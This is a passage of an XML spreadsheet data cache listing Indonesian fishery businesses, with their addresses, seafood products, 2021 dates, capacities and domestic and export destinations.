    <s v="Dusun Pesisir RT 001 RW 001, Kel. Kaduara Timur, Kec. Pragaan, Kabupaten Sumenep&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teri Nasi Kering"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="25060"/>
    <x v="1121"/>
    <s v="KARYA LELUHUR"/>
    <s v="Desa Banteng RT 03 No.75, Kec. Pangkalan Baru, Kabupaten Bangka Tengah&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kemplang Cumi-cumi"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Pangkal Pinang"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="25061"/>
    <x v="1121"/>
    <s v="KARYA LELUHUR"/>
    <s v="Desa Banteng RT 03 No.75, Kec. Pangkalan Baru, Kabupaten Bangka Tengah&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kemplang Ikan"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="13200"/>
    <s v="Kota Pangkal Pinang"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="25062"/>
    <x v="1121"/>
    <s v="KARYA LELUHUR"/>
    <s v="Desa Banteng RT 03 No.75, Kec. Pangkalan Baru, Kabupaten Bangka Tengah&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Kerupuk Ikan"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Pangkal Pinang"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="25078"/>
    <x v="1122"/>
    <s v="SUI KENG"/>
    <s v="Pancur No.1 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Bawal, Kerapu, Lebam, Ketarap, Kapas-kapas, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jambi, Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25079"/>
    <x v="1122"/>
    <s v="SUI KENG"/>
    <s v="Pancur No.1 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Japuh, Selar, Tenggiri)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jambi, Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25080"/>
    <x v="1122"/>
    <s v="SUI KENG"/>
    <s v="Pancur No.1 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Kepiting Segar"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jambi, Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25081"/>
    <x v="1122"/>
    <s v="SUI KENG"/>
    <s v="Pancur No.1 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Teri Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jambi, Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25082"/>
    <x v="1122"/>
    <s v="SUI KENG"/>
    <s v="Pancur No.1 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Kering (Sotong, Cumi-cumi)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jambi, Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25083"/>
    <x v="1123"/>
    <s v="PT, BARUNA SEGARA MANDIRI"/>
    <s v="Jl, Raya Pelabuhan No,8, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="28500"/>
    <s v="Kota Pasuruan, Kota Surabaya"/>
    <s v="Australia, China, Korea, Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25084"/>
    <x v="1124"/>
    <s v="TEK ENG"/>
    <s v="Pancur No.7 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Kerapu, Lebam, Ketarap, Kapas-kapas, Bawal, Kakap, Kurisi)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="3000"/>
    <s v="Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25085"/>
    <x v="1124"/>
    <s v="TEK ENG"/>
    <s v="Pancur No.7 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Teri Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="8000"/>
    <s v="Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25086"/>
    <x v="1124"/>
    <s v="TEK ENG"/>
    <s v="Pancur No.7 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Kering (Sotong, Cumi-cumi)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="4000"/>
    <s v="Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25087"/>
    <x v="1124"/>
    <s v="TEK ENG"/>
    <s v="Pancur No.7 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Japuh, Selar, Tenggiri)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="7000"/>
    <s v="Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25088"/>
    <x v="1124"/>
    <s v="TEK ENG"/>
    <s v="Pancur No.7 RT 001 RW 004, Kel. Pancur, Kec. Lingga Utara, Kabupaten Lingga&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Kepiting Segar"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Lingga, Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25089"/>
    <x v="1123"/>
    <s v="PT, BARUNA SEGARA MANDIRI"/>
    <s v="Jl, Raya Pelabuhan No,8, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Pasuruan, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25090"/>
    <x v="1038"/>
    <s v="PT. BANDAR NELAYAN"/>
    <s v="Jl. Ikan Tuna IV Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="2880000"/>
    <s v="Kabupaten Bandung, Kabupaten Karang Asem, Kota Denpasar"/>
    <s v="Philippines, United States"/>
  </r>
  <r>
    <n v="25091"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Salem)"/>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92"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Layang, Cakalang, Salem)"/>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93"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Barramundi, Kerapu, Kakap)"/>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94"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Segar (Barramundi, Kerapu, Kakap)"/>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95"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25096"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25097"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>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98"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="10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099"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="1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100"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Segar"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="100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101"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="1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102"/>
    <x v="1125"/>
    <s v="PT. BERKAH BAHARI MINA MAKMUR"/>
    <s v="Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25103"/>
    <x v="545"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Dusun Sibaganding, Kel. Janggir Leto, Kec. Panei, Kabupaten Simalungun&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Air Tawar Beku (Patin, Nila)"/>
    <d v="2021-05-04T00:00:00"/>
    <n v="4849390"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Canada, France, Italy, Singapore, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="25104"/>
    <x v="1126"/>
    <s v="UD, MAJU JAYA"/>
    <s v="Dusun Gempol RT 001 RW 004, Kel, Lampah, Kec, Kedamean, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, New Zealand, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25105"/>
    <x v="1126"/>
    <s v="UD, MAJU JAYA"/>
    <s v="Dusun Gempol RT 001 RW 004, Kel, Lampah, Kec, Kedamean, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering "/>
    <d v="2021-05-11T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, New Zealand, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25106"/>
    <x v="1126"/>
    <s v="UD, MAJU JAYA"/>
    <s v="Dusun Gempol RT 001 RW 004, Kel, Lampah, Kec, Kedamean, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25107"/>
    <x v="1126"/>
    <s v="UD, MAJU JAYA"/>
    <s v="Dusun Gempol RT 001 RW 004, Kel, Lampah, Kec, Kedamean, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara, Kabupaten Indramayu, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25111"/>
    <x v="21"/>
    <s v="PT. KARYA AGUNG LESTARI JAYA"/>
    <s v="Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25112"/>
    <x v="21"/>
    <s v="PT. KARYA AGUNG LESTARI JAYA"/>
    <s v="Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25113"/>
    <x v="1127"/>
    <s v="PT. LAUTAN SEJAHTERA GEMILANG"/>
    <s v="Gudang Taman Niaga Sukajadi Blok E1 No.1, Kel. Sukajadi, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="0"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="25114"/>
    <x v="1128"/>
    <s v="UD. JAYA ABADI SENTOSA"/>
    <s v="Kima XVII, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Deho, Marlin, Layaran, Layang)"/>
    <d v="2021-04-28T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="25115"/>
    <x v="1128"/>
    <s v="UD. JAYA ABADI SENTOSA"/>
    <s v="Kima XVII, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2021-04-28T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="25116"/>
    <x v="1129"/>
    <s v="PT, USAHA LAUT PANIPAHAN"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl, Pendaratan Ikan No,2, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="25117"/>
    <x v="1129"/>
    <s v="PT, USAHA LAUT PANIPAHAN"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl, Pendaratan Ikan No,2, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Barramundi, Kakap, Bawal Hitam, Gulama, Layur, Jenaha)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="25118"/>
    <x v="1129"/>
    <s v="PT, USAHA LAUT PANIPAHAN"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl, Pendaratan Ikan No,2, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="25119"/>
    <x v="1129"/>
    <s v="PT, USAHA LAUT PANIPAHAN"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl, Pendaratan Ikan No,2, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="25120"/>
    <x v="578"/>
    <s v="UD. MULTI SARANA NIAGA"/>
    <s v="Jl. Pendopo No.07 RT 019 RW 004, Kel. Sembayat, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Bandeng Isi, Bandeng Presto) "/>
    <d v="2021-05-28T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25121"/>
    <x v="578"/>
    <s v="UD. MULTI SARANA NIAGA"/>
    <s v="Jl. Pendopo No.07 RT 019 RW 004, Kel. Sembayat, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Asap"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Mojokerto, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25122"/>
    <x v="578"/>
    <s v="UD. MULTI SARANA NIAGA"/>
    <s v="Jl. Pendopo No.07 RT 019 RW 004, Kel. Sembayat, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abon Ikan"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25123"/>
    <x v="578"/>
    <s v="UD. MULTI SARANA NIAGA"/>
    <s v="Jl. Pendopo No.07 RT 019 RW 004, Kel. Sembayat, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kota Pasuruan, Kota Mojokerto, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25124"/>
    <x v="1130"/>
    <s v="CV. DELTON"/>
    <s v="Jl. Ir. Sutami, Kawasan Pergudangan Karunia Sulawesi Blok C No.11, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, India, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Tunisia, Viet Nam"/>
  </r>
  <r>
    <n v="25125"/>
    <x v="144"/>
    <s v="CV. MITRA KARYA"/>
    <s v="Griya Taman Asri GE No.01, Kel. Tawangsari, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kabupaten Tangerang"/>
    <s v="Hong Kong, Japan, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25126"/>
    <x v="144"/>
    <s v="CV. MITRA KARYA"/>
    <s v="Griya Taman Asri GE No.01, Kel. Tawangsari, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering "/>
    <d v="2021-05-11T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25127"/>
    <x v="144"/>
    <s v="CV. MITRA KARYA"/>
    <s v="Griya Taman Asri GE No.01, Kel. Tawangsari, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kabupaten Tangerang"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25128"/>
    <x v="144"/>
    <s v="CV. MITRA KARYA"/>
    <s v="Griya Taman Asri GE No.01, Kel. Tawangsari, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tulang Ikan Kering, Perut Ikan Kering, Kulit Ikan Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25129"/>
    <x v="144"/>
    <s v="CV. MITRA KARYA"/>
    <s v="Griya Taman Asri GE No.01, Kel. Tawangsari, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tulang Cumi-Cumi Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surabaya, Kabupaten Tangerang"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25130"/>
    <x v="144"/>
    <s v="CV. MITRA KARYA"/>
    <s v="Griya Taman Asri GE No.01, Kel. Tawangsari, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Kering (Gurita, Cumi-cumi)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25131"/>
    <x v="277"/>
    <s v="PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Asin Kaleng"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="22000"/>
    <s v="Kota Banda Aceh, Kota Medan, Kota Bandar Lampung, Kota Jakarta Pusat"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25132"/>
    <x v="277"/>
    <s v="PT, MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl, K, L, Yos Sudarso KM 10,5 Kawasan Industri Medan, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Seafood Kaleng"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="49000"/>
    <s v="Kota Banda Aceh, Kota Medan, Kota Bengkulu, Kota Jakarta Pusat, Kabupaten Lamongan"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="25133"/>
    <x v="1131"/>
    <s v="PT. PARLEVLIET PARABA SEAFOOD"/>
    <s v="Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="81810"/>
    <m/>
    <s v="France, Greece, Italy, Netherlands, Portugal, United Arab Emirates"/>
  </r>
  <r>
    <n v="25134"/>
    <x v="1131"/>
    <s v="PT. PARLEVLIET PARABA SEAFOOD"/>
    <s v="Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-06T00:00:00"/>
